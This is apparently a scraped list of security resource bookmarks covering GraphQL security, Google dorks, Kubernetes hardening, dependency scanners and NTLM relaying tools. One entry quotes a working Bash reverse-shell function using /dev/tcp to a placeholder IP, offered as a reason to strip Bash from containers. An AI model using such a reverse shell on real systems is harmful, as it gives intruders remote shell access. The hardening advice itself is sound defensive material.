A curated list of awesome GraphQL Security frameworks, libraries, software and resources - GitHub - Escape-Technologies/awesome-graphql-security: A curated list of awesome GraphQL Security frameworks, libraries, software and resources

Useful Google Dorks for WebSecurity and Bug Bounty - GitHub - Proviesec/google-dorks: Useful Google Dorks for WebSecurity and Bug Bounty

Trivy v0.29.0 release brings many updates, such as RBAC security and Helm chart scanning, custom extensions, a Trivy Operator Lens integration, and more

This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Web Applications today are more complex than ever. I’m writing this series to organize and process some core ideas and…

https://madhuakula.com/kubernetes-goat/about.html

whatfiles is a Linux utility. It traces any new processes and threads that are created by the targeted process as well.

Fully open-source security audit for project dependencies based on known vulnerabilities and advisories. Supports both local repos and container images. Integrates with various CI environments such as Azure Pipelines, CircleCI, Google CloudBuild. No server required! - GitHub - AppThreat/dep-scan: Fully open-source security audit for project dependencies based on known vulnerabilities and advisories. Supports both local repos and container images. Integrates with various CI environments such as Azure Pipelines, CircleCI, Google CloudBuild. No server required!

Compilation of Resources from TCM's OSINT Course. Contribute to TCM-Course-Resources/Open-Source-Intellingence-Resources development by creating an account on GitHub.

https://youtu.be/K2BKgAN2Oj4

A repo to automatically generates and keep updated a series of Docker images through GitHub Actions. - GitHub - cybersecsi/RAUDI: A repo to automatically generates and keep updated a series of Docker images through GitHub Actions.

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth. - GitHub - sc0tfree/updog: Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

Using SSH agent forwarding is dangerous. However, a dedicated agent can mitigate the risks.

Important for HCL Connections Automation! The global UseAgentForward needs more documentation and anrework to avoid.

NTLM relaying for Windows made easy. Contribute to CCob/lsarelayx development by creating an account on GitHub.

https://securekubernetes.com/

A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh, which doesn’t include this oft-abused feature:
revshell() {
local TARGET_IP="${1:-123.123.123.123}";
local TARGET_PORT="${2:-1234}";
while :; do
nohup bash -i &> \
/dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
sleep 1;
done
}

While Kubernetes has many advantages, it also brings new security challenges.

Securing applications is not the easiest thing to do. An application has many components: server-side logic, client-side logic, data storage, data transportation, API, and more. With all these…

How to configure your browser to block web fonts to speed up your web browsing and protect your privacy.

Vulnerable by design